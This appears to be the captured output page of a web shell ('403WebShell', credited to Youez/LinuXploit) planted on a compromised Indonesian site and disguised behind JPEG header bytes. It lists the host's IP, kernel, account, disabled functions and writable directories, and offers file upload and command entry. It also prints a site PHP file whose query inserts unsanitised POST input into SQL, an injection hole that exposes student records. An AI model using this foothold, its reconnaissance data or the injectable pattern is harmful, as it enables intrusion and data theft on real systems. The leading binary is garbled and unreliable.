JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 191.101.228.110  /  Your IP : 216.73.216.163
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/vermail_id.php
<?php
session_start();

include "koneksi.php";

$username=$_POST['username'];
?>

<?php
// include "koneksi.php"; 
	// cek apakah yang mengakses halaman ini sudah login
//	ob_start();session_start();
//	if($_SESSION['level']<>"user"){
//		header("location:location:../login.php");
//}
?>

<html lang="en">
<head>
<head>
	<meta charset="UTF-8">
	<title>IDI</title>

    
    
</head>
<style>
body{
  font-family: sans-serif;
  	font-size:16px;
}
#form-div {
	background-image:;
	padding-left: 50px;
	padding-right:50px;
	padding-top:35px;
	padding-bottom:50px;
	width: 650px;
	float: left;

	
    margin-top:30px;
	margin-left: 350px;
  -moz-border-radius: 7px;
  -webkit-border-radius: 7px;	
    border: 1px solid #dedede;
}
.alamat{
    width: 80%;
    height: 150px;
    line-height: 150%;
    resize:vertical;
	padding: 10px;
}
input, textarea { 
	padding: 9px; 
	border: solid 1px #E5E5E5; 
	outline: 0; 
	font: normal 13px/100% Verdana, Tahoma, sans-serif; 
	width: 200px; 
	background: #FFFFFF url('bg_form.png') left top repeat-x; 
	background: -webkit-gradient(linear, left top, left 25, from(#FFFFFF), color-stop(4%, #EEEEEE), to(#FFFFFF)); 
	background: -moz-linear-gradient(top, #FFFFFF, #EEEEEE 1px, #FFFFFF 25px); 
	box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px; 
	-moz-box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px; 
	-webkit-box-shadow: rgba(0,0,0, 0.1) 0px 0px 8px; 
	} 
  
textarea { 
	width: 400px; 
	max-width: 400px; 
	height: 150px; 
	line-height: 150%; 
	} 
  
input:hover, textarea:hover, 
input:focus, textarea:focus { 
	border-color: #C9C9C9; 
	-webkit-box-shadow: rgba(0, 0, 0, 0.15) 0px 0px 8px; 
	} 
  
.form label { 
	margin-left: 10px; 
	color: #999999; 
	} 
  
.submit input { 
	width: auto; 
	padding: 9px 15px; 
	background: #617798; 
	border: 0; 
	font-size: 14px; 
	color: #FFFFFF; 
	-moz-border-radius: 5px; 
	-webkit-border-radius: 5px; 
	}
@media only screen and (max-width: 580px) {
	#form-div{
		left: 3%;
		margin-right: 3%;
		width: 100%;
		margin-left: 0;
		padding-left: 3%;
		padding-right: 3%;
	}
}
</style>


        <link rel='stylesheet' href='css/bootstrap.min.css'>
        <script src='https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js'></script>
        <script src='https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js'></script>
        <script src='js/bootstrap.min.js'></script>


</head>
<body>
	<div class="container">
		<h4>Lupa ID Login by mail</h4>
		<hr>
<div id="form-div">

* ID Anda by MobileNo Registrasi.<br>
* Jika ID dan MobileNo Anda Sudah sesuai tapi  lupa Password <br>
	Click disini untuk Recovery Password.<br>
	<span class="psw"> <a href="forgot.php"> Lupa Password?</a></span><br>
                  <br>   
    Password Baru akan dikirim ke Email registrasi anda.<br>
	<br> 
	
<table class="table table-bordered" id="dataTable" width="100%" cellspacing="0">
    <thead>
      <tr>  
        <th>No</th>
		<th>ID</th>
        <th>Nama</th>
		
	   
		<th>Status</th> 
		 
     

      </tr>
    </thead>
    <tbody >
      <?php


		
	  	$row = $konek->query("SELECT * FROM mahasiswa where nama_mhs LIKE '%$username%' and registrasi='2' order by nama_mhs") or die(mysqli_error());

					  
					  $hari = date('Y-m-d');
					  $no = 1;
			   
					  while($fetch = $row->fetch_array()){
				      $email7= $fetch['email'];  
						  
					//  // proses data apabila sudah diinput
//      
//                      // simbol bintang dimulai dari digit kesatu
//                    $awal_bintang_handphone = 1;
//                    // melakukan perulangan bintang sebanyak digit yang telah ditentukan
//                    for ($bintang_handphone = ""; ($bintang_handphone = $bintang_handphone . "*"); $awal_bintang_handphone++) {
//                        // menentukan digit yang akan dijadikan simbol bintang
//                        if ($awal_bintang_handphone == strlen($fetch['telp']) - 8) {
//                            break;
//                        }
//                    }
//                    // menentukan digit awal yang tidak dijadikan bintang
//                   // $handphone_awal = substr($fetch['telp'], 0, 4);
//                    // menentukan digit akhir yang tidak dijadikan bintang
//                    $handphone_akhir = substr($fetch['telp'], - 4);
//                    // menampilkan hasil nomor handphone yang sebagian digitnya menjadi simbol bintang 
//                     $handphone_awal="+62****";
//					$hp=$handphone_awal.$bintang_handphone.$handphone_akhir;
					   ?>
					   <tr>
						<td><?php echo $no ?></td>
						<td><?php echo $fetch['npm']?></td>    
						<td><?php echo $fetch['nama_mhs']?></a></td>
						
				
					    <td><?php echo $fetch['status']?></a></td>
				  		
				  
				  
				  	
				  
					  </tr>
					  <?php
					   $no++;
					}
					?>
				  </tbody>
				</table>


</div>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit